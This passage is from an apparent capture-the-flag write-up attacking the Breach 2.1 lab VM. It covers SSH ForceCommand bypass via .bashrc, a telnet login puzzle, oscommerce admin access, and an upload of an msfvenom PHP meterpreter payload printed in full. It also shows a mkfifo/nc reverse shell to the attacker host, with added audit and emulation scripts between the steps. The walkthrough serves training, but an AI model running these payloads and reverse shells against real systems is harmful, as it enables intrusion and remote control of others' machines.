-rw------- 1 peter peter   5 Jul 20 2016 .bash_history
-rw-r--r-- 1 peter peter 220 Jun 14 2016 .bash_logout
-rw-r--r-- 1 peter peter 3515 Jun 14 2016 .bashrc
drwx------ 7 peter peter 4096 Jun 19 2016 .cache
drwx------ 12 peter peter 4096 Jun 19 2016 .config
drwx------ 3 peter peter 4096 Jun 19 2016 .dbus
-rw------- 1 peter peter   26 Jun 18 2016 .dmrc
drwx------ 3 peter peter 4096 Jun 19 2016 .gconf
drwx------ 2 peter peter 4096 Jun 19 2016 .gnupg
drwx------ 4 peter peter 4096 Jun 19 2016 .kde
drwx------ 3 peter peter 4096 Jun 19 2016 .local
drwx------ 4 peter peter 4096 Jun 19 2016 .mozilla
-rw-r--r-- 1 peter peter 675 Jun 14 2016 .profile
-rw-r--r-- 1 peter peter   66 Jun 15 2016 .selected_editor
drwx------ 2 peter peter 4096 Jun 19 2016 .ssh
drwxr-xr-x 2 peter peter 4096 Jun 19 2016 Desktop
drwxr-xr-x 2 peter peter 4096 Jun 19 2016 Documents
drwxr-xr-x 2 peter peter 4096 Jun 19 2016 Downloads
drwxr-xr-x 2 peter peter 4096 Jun 19 2016 Music
drwxr-xr-x 2 peter peter 4096 Jun 19 2016 Pictures
drwxr-xr-x 2 peter peter 4096 Jun 19 2016 Public
drwxr-xr-x 2 peter peter 4096 Jun 19 2016 Templates
drwxr-xr-x 2 peter peter 4096 Jun 19 2016 Videos
-rwxr-xr-x 1 peter peter 118 Jun 19 2016 firefox.sh
peter@breach2:~$ echo 'exec sh' > .bashrc
echo 'exec sh' > .bashrc
peter@breach2:~$ cat .bashrc                
cat .bashrc
exec sh

Note: .bashrc

  • To load the user's configuration, bash reads .bashrc each time it starts.

  • Every user's home directory has this shell script.

  • It stores and loads the user's terminal configuration and environment variables.
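The bypass above comes down to how sshd runs a forced command: as `<login shell> -c <command>`, and bash sources the user-writable ~/.bashrc whenever it detects it was started by sshd. The following audit script is an added example, not part of the original post: it parses an sshd_config excerpt modelled on the file dumped above and flags that combination; the user-to-shell mapping is a constructed stand-in for /etc/passwd, and peter's login shell being bash is an assumption.

```python
import re
from typing import Dict, List

# Constructed excerpt modelled on the sshd_config dumped above (not the full file).
SAMPLE_SSHD_CONFIG = """\
# What ports, IPs and protocols we listen for
Port 65535
Protocol 2
PermitRootLogin no
PubkeyAuthentication yes
ChallengeResponseAuthentication no
#PasswordAuthentication yes
X11Forwarding yes
UsePAM yes
AllowUsers peter
ForceCommand /usr/bin/startme
AddressFamily inet
"""

# Login shells that read a user-writable startup file even for a forced,
# non-interactive command: bash sources ~/.bashrc when started by sshd (bash(1)).
RC_READING_SHELLS = {"/bin/bash", "/usr/bin/bash"}


def parse_sshd_config(text: str) -> Dict[str, List[str]]:
    """Keyword -> list of values; keywords lower-cased, comments and blanks skipped.
    Values stay as lists because some keywords legitimately repeat (HostKey)."""
    cfg: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        # sshd_config accepts both "Keyword value" and "Keyword=value".
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) == 2:
            cfg.setdefault(parts[0].lower(), []).append(parts[1].strip())
    return cfg


def effective(cfg: Dict[str, List[str]], key: str, default: str) -> str:
    """sshd honours the first occurrence of a keyword; fall back to the
    compiled-in default when the keyword is absent."""
    values = cfg.get(key)
    return values[0] if values else default


def audit_sshd_config(text: str, login_shells: Dict[str, str]) -> List[str]:
    """Return findings for the config. login_shells maps user -> login shell
    (what /etc/passwd reports) so the ForceCommand check knows which shell
    will wrap the forced command."""
    cfg = parse_sshd_config(text)
    findings: List[str] = []

    forced = effective(cfg, "forcecommand", "")
    if forced:
        # Without AllowUsers every known account may log in, so check them all.
        allowed = " ".join(cfg.get("allowusers", [])).split() or list(login_shells)
        for user in allowed:
            shell = login_shells.get(user, "")
            if shell in RC_READING_SHELLS:
                findings.append(
                    f"ForceCommand {forced} for user {user} runs as '{shell} -c', "
                    "which sources ~/.bashrc first; if the user can write that file "
                    "the forced command is not a sandbox. Use a login shell that reads "
                    "no user-writable startup file, or a dedicated locked-down account."
                )

    # PasswordAuthentication defaults to yes, so an absent keyword still means on.
    if effective(cfg, "passwordauthentication", "yes").lower() == "yes":
        findings.append("PasswordAuthentication is on (default when unset); prefer keys only")
    if effective(cfg, "x11forwarding", "no").lower() == "yes":
        findings.append("X11Forwarding is enabled; disable it unless graphical sessions are needed")
    if effective(cfg, "permitrootlogin", "prohibit-password").lower() == "yes":
        findings.append("PermitRootLogin yes allows direct root logins")
    return findings


if __name__ == "__main__":
    # Constructed stand-in for /etc/passwd; peter's shell is assumed to be bash.
    shells = {"root": "/bin/bash", "peter": "/bin/bash", "www-data": "/usr/sbin/nologin"}
    for finding in audit_sshd_config(SAMPLE_SSHD_CONFIG, shells):
        print("-", finding)
```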

SSH login as peter now succeeds

ssh peter@192.168.110.151 -p65535

  • Password: inthesource

┌──(root㉿kali)-[~]
└─# ssh peter@192.168.110.151 -p65535
#############################################################################
#                 Welcome to Initech Cyber Consulting, LLC                 #
#                 All connections are monitored and recorded               #
#                     Unauthorized access is encouraged                     #
#             Peter, if that's you - the password is in the source.         #
#         Also, stop checking your blog all day and enjoy your vacation!   #
#############################################################################
[email protected]'s password:
$ whoami
peter

6. Privilege escalation

Information gathering

sudo -l

history # shell history

uname -a # kernel version

ps -anx |grep root # processes running as root

ps -ef

crontab -l # scheduled tasks

ls -la # hidden files and their permissions

find / -perm -u=s -type f 2>/dev/null # SUID binaries

find / -perm -g=s -type f 2>/dev/null # SGID binaries

netstat -tunlpa # listening ports and active connections

cat /etc/passwd

Besides peter there are two more accounts with home directories: milton (shell /bin/bash) and blumbergh (shell /bin/false)

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:109::/var/run/dbus:/bin/false
avahi:x:105:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:112::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:116:colord colour management daemon,,,:/var/lib/colord:/bin/false
geoclue:x:110:117::/var/lib/geoclue:/bin/false
rtkit:x:113:121:RealtimeKit,,,:/proc:/bin/false
saned:x:114:122::/var/lib/saned:/bin/false
usbmux:x:115:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
Debian-gdm:x:116:123:Gnome Display Manager:/var/lib/gdm3:/bin/false
peter:x:1000:1000:peter,,,:/home/peter:/bin/bash
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:112:125:MySQL Server,,,:/nonexistent:/bin/false
blumbergh:x:1001:1001::/home/blumbergh:/bin/false
milton:x:1002:1002::/home/milton:/bin/bash
telnetd:x:117:126::/nonexistent:/bin/false
dnsmasq:x:118:65534:dnsmasq,,,:/var/lib/misc:/bin/false

An unfamiliar port, 2323, is listening, and only on 127.0.0.1, so it is reachable from the box itself but was invisible to the nmap scan from Kali

$ netstat -tunlpa
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp       0     0 0.0.0.0:41978           0.0.0.0:*               LISTEN     -              
tcp       0     0 0.0.0.0:65535           0.0.0.0:*               LISTEN     -              
tcp       0     0 127.0.0.1:3306         0.0.0.0:*               LISTEN     -              
tcp       0     0 0.0.0.0:111             0.0.0.0:*               LISTEN     -              
tcp       0     0 127.0.0.1:2323         0.0.0.0:*               LISTEN     -              
tcp       0     0 192.168.110.151:41299   192.168.110.128:5868   ESTABLISHED 2068/Ujaax      
tcp       0     0 192.168.110.151:44311   192.168.110.128:3000   TIME_WAIT   -              
tcp       0     0 192.168.110.151:58219   192.168.110.128:8080   ESTABLISHED 2068/Ujaax      
tcp       0     0 192.168.110.151:52900   192.168.110.128:8989   ESTABLISHED 6389/nc        
tcp       0     0 192.168.110.151:58220   192.168.110.128:8080   ESTABLISHED 2068/Ujaax      
tcp       0     0 192.168.110.151:65535   192.168.110.128:59798   ESTABLISHED -              
tcp       0     0 192.168.110.151:52086   192.168.110.128:4433   ESTABLISHED 2068/Ujaax      
tcp6       0     0 :::53272               :::*                   LISTEN     -              
tcp6       0     0 :::111                 :::*                   LISTEN     -              
tcp6       0     0 :::80                   :::*                   LISTEN     -              
udp       0     0 0.0.0.0:39841           0.0.0.0:*                           -              
udp       0     0 192.168.110.151:53925   192.168.72.2:53         ESTABLISHED -              
udp       0     0 192.168.110.151:49875   192.168.72.2:53         ESTABLISHED 2068/Ujaax      
udp       0     0 0.0.0.0:5353           0.0.0.0:*                           -              
udp       0     0 0.0.0.0:1006           0.0.0.0:*                           -              
udp       0     0 127.0.0.1:1016         0.0.0.0:*                           -              
udp       0     0 0.0.0.0:44036           0.0.0.0:*                           -              
udp       0     0 0.0.0.0:111             0.0.0.0:*                           -              
udp6       0     0 :::5353                 :::*                               -              
udp6       0     0 :::1006                 :::*                               -              
udp6       0     0 :::57919               :::*                               -              
udp6       0     0 :::36695               :::*                               -              
udp6       0     0 :::111                 :::*                               -              

Connect to it with telnet

telnet 127.0.0.1 2323

$ telnet 127.0.0.1 2323
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
29 45'46" N 95 22'59" W

It is a coordinate; a search shows it is the coordinate of Houston. Try the usernames found above, milton and blumbergh, against this login with that as the password

Houston is the southeast anchor of the greater megaregion known as the Texas Triangle with coordinates 29° 45′ 46″ N, 95° 22′ 59″ W (29.762778, -95.383056).

With a working password, connect over telnet again

telnet 127.0.0.1 2323

  • Username: milton

  • Password: Houston

$ telnet 127.0.0.1 2323
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
29 45'46" N 95 22'59" W
breach2 login: milton
Password:
Last login: Wed Jul 20 21:04:18 EDT 2016 from localhost on pts/0
Linux breach2 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt25-2 (2016-04-08) x86_64
29 45'46" N 95 22'59" W
3
2
1
Whose stapler is it?

The login succeeds, but a few extra lines are printed first, ending in "Whose stapler is it?". That string does not appear out of nowhere; some program run at login must be printing it.

Use grep to search the whole filesystem for the file that contains it

grep -r "Whose stapler is it?" / 2>/dev/null

  • -r # search directories recursively

  • / # start from the filesystem root

  • 2>/dev/null # discard the permission-denied errors

$ grep -r "Whose stapler is it?" / 2>/dev/null
/usr/local/bin/cd.py:   question = raw_input("Whose stapler is it?")
Binary file /proc/6839/task/6839/cmdline matches
Binary file /proc/6839/cmdline matches
Binary file /proc/6840/task/6840/cmdline matches
Binary file /proc/6840/cmdline matches

Look at the source of /usr/local/bin/cd.py

cat /usr/local/bin/cd.py

$ cat /usr/local/bin/cd.py
#!/usr/bin/python

import signal
import time
import os

s = signal.signal(signal.SIGINT, signal.SIG_IGN)

countdown=3

while countdown >0:
      time.sleep(1)
      print(countdown)
      countdown -=1
if countdown <1:
      question = raw_input("Whose stapler is it?")
if question == "mine":
      os.system("echo 'Woot!'")
else:

      os.system("kill -9 %d"%(os.getppid()))
      signal.signal(signal.SIGINT, s)
you have mail

Reading the source: the expected answer is mine. After a three-second countdown (with Ctrl-C ignored), the script prompts with raw_input, which has no timeout; any answer other than mine makes it SIGKILL its parent process, the login shell, ending the session. There is no need to type within three seconds: the terminal queues typed lines until raw_input reads them, so mine can be entered during the countdown, which is why it shows up before the 3-2-1 in the transcript below. (The trailing "you have mail" above is the shell's mail notice, not part of the script.) Log in again and answer mine:

telnet 127.0.0.1 2323

  • Username: milton

  • Password: Houston

  • Answer: mine

milton@breach2:~$ telnet 127.0.0.1 2323
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
29 45'46" N 95 22'59" W
breach2 login: milton
Password:
Last login: Wed May 10 04:18:01 EDT 2023 from localhost on pts/4
Linux breach2 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt25-2 (2016-04-08) x86_64
29 45'46" N 95 22'59" W
mine
3
2
1
Whose stapler is it?Woot!
milton@breach2:~$ whoami
milton
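Two things a practitioner would want to confirm about that gate are that an answer queued before the prompt appears is still accepted, and that a wrong answer really does kill the parent process rather than the script itself. The block below is an added example, not code from the Breach 2.1 VM: GATE is a Python 3 port of the cd.py printed above, with the countdown length taken from argv (cd.py hard-codes 3) so the demo runs quickly, and a throwaway `sh -c` stands in for the login shell.

```python
"""Emulate the cd.py login gate and check how it behaves.
Added example, not the VM's code: GATE is a Python 3 port of cd.py with
the countdown length taken from argv; a throwaway sh stands in for the
login shell that runs cd.py on the target."""
import os
import shlex
import subprocess
import sys
import tempfile
import textwrap

GATE = textwrap.dedent('''\
    import os, signal, sys, time
    # Ctrl-C is ignored during the countdown, as in the original cd.py
    saved = signal.signal(signal.SIGINT, signal.SIG_IGN)
    countdown = int(sys.argv[1])          # cd.py hard-codes 3
    while countdown > 0:
        time.sleep(1)
        print(countdown, flush=True)
        countdown -= 1
    # input() has no timeout: the prompt waits for a line however long it takes
    question = input("Whose stapler is it?")
    if question == "mine":
        os.system("echo 'Woot!'")
    else:
        # wrong answer: SIGKILL the parent, i.e. the shell that started us
        os.system("kill -9 %d" % os.getppid())
        signal.signal(signal.SIGINT, saved)
''')


def run_gate(answer, countdown=1):
    """Run the gate under a throwaway sh (standing in for the login shell)
    with `answer` already queued on stdin before the countdown starts.
    Returns (everything printed, exit status of the sh wrapper): 0 if sh
    lived to run its second command, -9 if the gate SIGKILLed it."""
    with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as f:
        f.write(GATE)
        path = f.name
    try:
        # Two commands in -c, so sh forks for the gate instead of exec'ing
        # straight into it (which would make *this* process the gate's parent).
        wrapper = (f"{shlex.quote(sys.executable)} {shlex.quote(path)} {countdown}"
                   "; echo shell-survived")
        proc = subprocess.run(["sh", "-c", wrapper], input=answer + "\n",
                              capture_output=True, text=True)
    finally:
        os.unlink(path)
    return proc.stdout, proc.returncode


if __name__ == "__main__":
    for answer in ("mine", "yours"):
        out, rc = run_gate(answer)
        print(f"answer={answer!r} sh_exit={rc}\n{out}")
```

With "mine" the wrapper shell survives (exit 0) and "Woot!" appears after the countdown even though the answer was written before it started; with any other answer the wrapper dies with SIGKILL (exit status -9 as reported by subprocess) and its second command never runs, which is exactly what closes the telnet session on the VM.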

More enumeration as milton turned up no path to root, but it did reveal another unfamiliar listener, port 8888, this time bound to all interfaces

netstat -tunlpa

milton@breach2:~$ netstat -tunlpa
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp       0     0 0.0.0.0:8888           0.0.0.0:*               LISTEN     -              
tcp       0     0 0.0.0.0:41978           0.0.0.0:*               LISTEN     -              
tcp       0     0 0.0.0.0:65535           0.0.0.0:*               LISTEN     -              
tcp       0     0 127.0.0.1:3306         0.0.0.0:*               LISTEN     -              
tcp       0     0 0.0.0.0:111             0.0.0.0:*               LISTEN     -              
tcp       0     0 127.0.0.1:2323         0.0.0.0:*               LISTEN     -              
tcp       0     0 192.168.110.151:41299   192.168.110.128:5868   ESTABLISHED -              
tcp       0     0 127.0.0.1:40897         127.0.0.1:2323         ESTABLISHED 6960/telnet    
tcp       0     0 192.168.110.151:58219   192.168.110.128:8080   ESTABLISHED -              
tcp       0     0 127.0.0.1:2323         127.0.0.1:40897         ESTABLISHED -              
tcp       0     0 192.168.110.151:58220   192.168.110.128:8080   ESTABLISHED -              
tcp       0     36 192.168.110.151:65535   192.168.110.128:59798   ESTABLISHED -              
tcp       0     0 127.0.0.1:2323         127.0.0.1:40896         ESTABLISHED -              
tcp       0     0 127.0.0.1:40896         127.0.0.1:2323         ESTABLISHED -              
tcp       0     0 192.168.110.151:52086   192.168.110.128:4433   ESTABLISHED -              
tcp6       0     0 :::8888                 :::*                   LISTEN     -              
tcp6       0     0 :::53272               :::*                   LISTEN     -              
tcp6       0     0 :::111                 :::*                   LISTEN     -              
tcp6       0     0 :::80                   :::*                   LISTEN     -              
udp       0     0 0.0.0.0:39841           0.0.0.0:*                           -              
udp       0     0 192.168.110.151:49875   192.168.72.2:53         ESTABLISHED -              
udp       0     0 0.0.0.0:5353           0.0.0.0:*                           -              
udp       0     0 0.0.0.0:1006           0.0.0.0:*                           -              
udp       0     0 127.0.0.1:1016         0.0.0.0:*                           -              
udp       0     0 0.0.0.0:44036           0.0.0.0:*                           -              
udp       0     0 0.0.0.0:111             0.0.0.0:*                           -              
udp6       0     0 :::5353                 :::*                               -              
udp6       0     0 :::1006                 :::*                               -              
udp6       0     0 :::57919               :::*                               -              
udp6       0     0 :::36695               :::*                               -              
udp6       0     0 :::111                 :::*                               -              

Probe it with telnet; a stray ^] sent as input comes back as an HTTP 400 from nginx, so it is a web server

telnet 127.0.0.1 8888

milton@breach2:~$ telnet 127.0.0.1 8888
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
^]
HTTP/1.1 400 Bad Request
Server: nginx/1.6.2
Date: Wed, 10 May 2023 08:24:53 GMT
Content-Type: text/html
Content-Length: 172
Connection: close

<html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.6.2</center>
</body>
</html>
Connection closed by foreign host.

It looks like an HTTP service, so re-run the full nmap scan from Kali: compared with the first scan, two services have appeared, Apache on 80 and nginx on 8888

nmap -A -p- 192.168.110.151

┌──(root㉿kali)-[~]
└─# nmap -A -p- 192.168.110.151
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-12 08:25 CST
Nmap scan report for 192.168.110.151
Host is up (0.00085s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open http   Apache httpd 2.4.10 ((Debian))
|_http-title: Initech Cyber Consulting, LLC
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto service
|   100000 2,3,4       111/tcp   rpcbind
|   100000 2,3,4       111/udp   rpcbind
|   100000 3,4         111/tcp6 rpcbind
|   100000 3,4         111/udp6 rpcbind
|   100024 1         36695/udp6 status
|   100024 1         41978/tcp   status
|   100024 1         44036/udp   status
|_ 100024 1         53272/tcp6 status
8888/tcp open http   nginx 1.6.2
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME               FILENAME
| -     15-Jun-2016 20:50 oscommerce/
| 867   15-Jun-2016 18:09 index.nginx-debian.html
|_
|_http-server-header: nginx/1.6.2
41978/tcp open status 1 (RPC #100024)
65535/tcp open ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey:
|   1024 f3539a0b4076b102873ea57aae859d26 (DSA)
|   2048 9aa8db784b444ffbe5836b67e3acfbf5 (RSA)
|   256 c163f1dc8f24818235fa881ab8734024 (ECDSA)
|_ 256 3b4d56375ec3457515cd85004f8ba85e (ED25519)
MAC Address: 00:0C:29:6D:6F:E1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.85 ms 192.168.110.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.87 seconds

There is an oscommerce directory. The SQL injection earlier in this write-up dumped a username and password from this application's database

http://192.168.110.151:8888/oscommerce/

  • Username: admin

  • Password: admin

With credentials in hand, brute-force the directory structure to find the admin login

dirb http://192.168.110.151:8888/oscommerce/

┌──(root㉿kali)-[~]
└─# dirb http://192.168.110.151:8888/oscommerce/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri May 12 08:36:12 2023
URL_BASE: http://192.168.110.151:8888/oscommerce/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.110.151:8888/oscommerce/ ----
+ http://192.168.110.151:8888/oscommerce/.htaccess (CODE:200|SIZE:829)
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/admin/
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/download/
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/ext/
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/images/
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/includes/
+ http://192.168.110.151:8888/oscommerce/index.php (CODE:200|SIZE:9022)
+ http://192.168.110.151:8888/oscommerce/info.php (CODE:200|SIZE:8064)
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/pub/
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/templates/

Log in to the back end with those credentials

http://192.168.110.151:8888/oscommerce/admin/

  • Username: admin

  • Password: admin

Logged in. Now look for an upload point to plant a web shell

The admin panel has a file manager

Under the includes directory there is a writable directory, work

Generate a PHP meterpreter payload with msfvenom and copy the generated source

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=6869 -f raw -o shell.php

┌──(root㉿kali)-[~]
└─# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=6869 -f raw -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1116 bytes
Saved as: shell.php

┌──(root㉿kali)-[~]
└─# cat shell.php
/*<?php /**/ error_reporting(0); $ip = '192.168.110.128'; $port = 6869; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Create a new file shell.php in the work directory, paste the payload source into it and save

On Kali, start a listener with msf's multi/handler

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 192.168.110.128

set LPORT 6869

options

run

┌──(root㉿kali)-[~]
└─# msfconsole
                                                 
                                  ___         ____
                              ,-""   `.     < HONK >
                            ,' _   e )`-._ / ----
                          / ,' `-._<.===-'
                          / /
                        / ;
            _         /   ;
(`._   _.-"" ""--..__,'   |
<_ `-""                     \
<`-                         :
  (__   <__.                 ;
    `-.   '-.__.     _.'   /
      \     `-.__,-'   _,'
        `._   ,   /__,-'
          ""._\__,'< <____
                | | `----.`.
                | |       \ `.
                ; |___     \-``
                \   --<
                `.`.<
                  `-'



      =[ metasploit v6.2.36-dev                         ]
+ -- --=[ 2277 exploits - 1191 auxiliary - 408 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules? Try
globally setting it with setg RHOSTS x.x.x.x
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.110.128
LHOST => 192.168.110.128
msf6 exploit(multi/handler) > set LPORT 6869
LPORT => 6869
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

  Name Current Setting Required Description
  ---- --------------- -------- -----------


Payload options (php/meterpreter/reverse_tcp):

  Name   Current Setting Required Description
  ----   --------------- -------- -----------
  LHOST 192.168.110.128 yes       The listen address (an interface may be specified)
  LPORT 6869             yes       The listen port


Exploit target:

  Id Name
  -- ----
  0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.110.128:6869

Request the shell in a browser; a session comes back running as blumbergh, the account the PHP code executes under

http://192.168.110.151:8888/oscommerce/includes/work/shell.php

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.110.128:6869
[*] Sending stage (39927 bytes) to 192.168.110.151
[*] Meterpreter session 1 opened (192.168.110.128:6869 -> 192.168.110.151:36386) at 2023-05-12 09:09:33 +0800

meterpreter > getuid
Server username: blumbergh

Upgrade the shell

python -c 'import pty; pty.spawn("/bin/bash")'

meterpreter > shell
Process 7772 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
blumbergh@breach2:/var/www/html2/oscommerce/includes/work$

Hand the shell over to a plain nc listener on Kali; start the listener first

nc -lvnp 8989

┌──(root㉿kali)-[~]
└─# nc -lvnp 8989
listening on [any] 8989 ...

From the shell inside the meterpreter session, run the named-pipe nc reverse shell (this form needs no nc -e: nc's output is fed through the FIFO into sh's stdin, and sh's output goes back out through nc)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.110.128 8989 >/tmp/f

Kali receives the connection

┌──(root㉿kali)-[~]
└─# nc -lvnp 8989
listening on [any] 8989 ...
connect to [192.168.110.128] from (UNKNOWN) [192.168.110.151] 53852
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(blumbergh) gid=1001(blumbergh) groups=1001(blumbergh),1004(fin)

Upgrade to a full TTY

python -c 'import pty; pty.spawn("/bin/bash")'

CTRL+Z

stty raw -echo

fg

ls

export SHELL=/bin/bash

export TERM=screen

stty rows 32 columns 145

reset

┌──(root㉿kali)-[~]
└─# nc -lvnp 8989                                                                                                                                
listening on [any] 8989 ...
connect to [192.168.110.128] from (UNKNOWN) [192.168.110.151] 53852
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(blumbergh) gid=1001(blumbergh) groups=1001(blumbergh),1004(fin)
$ python -c 'import pty; pty.spawn("/bin/bash")'
blumbergh@breach2:/var/www/html2/oscommerce/includes/work$ ^Z
[1]+  Stopped                 nc -lvnp 8989

┌──(root㉿kali)-[~]
└─# stty raw -echo                                                                                                                              

┌──(root㉿kali)-[~]
└─#                                                                                                                                              
nc -lvnp 8989
            ls
also_purchased-1.cache
backpipe
box-reviews-1-en_US.cache
box-reviews-en_US.cache
box-whats_new-en_US-USD.cache
box_best_sellers-0-en_US.cache
box_best_sellers-2-en_US.cache
category_tree-en_US.cache
configuration.cache
currencies.cache
images_groups-1.cache
languages-en_US-account.cache
languages-en_US-general.cache
languages-en_US-index.cache
languages-en_US-info.cache
languages-en_US-modules-boxes.cache
languages-en_US-modules-content.cache
languages-en_US-products.cache
languages.cache
manufacturers.cache
new_products-en_US-USD-0.cache
oscommerce_errors.log
shell.php
templates.cache
templates_boxes_layout-default-account-login.php.cache
templates_boxes_layout-default-index-index.php.cache
templates_boxes_layout-default-index-product_listing.php.cache
templates_boxes_layout-default-info-info.php.cache
templates_boxes_layout-default-products-info.php.cache
templates_content_layout-default-account-login.php.cache
templates_content_layout-default-index-index.php.cache
templates_content_layout-default-index-product_listing.php.cache
templates_content_layout-default-info-info.php.cache
templates_content_layout-default-products-info.php.cache
upcoming_products-en_US-USD.cache
weight-classes.cache
weight-rules.cache
blumbergh@breach2:/var/www/html2/oscommerce/includes/work$ stty raw -echo
blumbergh@breach2:/var/www/html2/oscommerce/includes/work$

sudo -l shows that tcpdump can be run as root without a password, which is enough to escalate

sudo -l

blumbergh@breach2:/var/www/html2/oscommerce/includes/work$ sudo -l                                       
Matching Defaults entries for blumbergh on breach2:
  env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

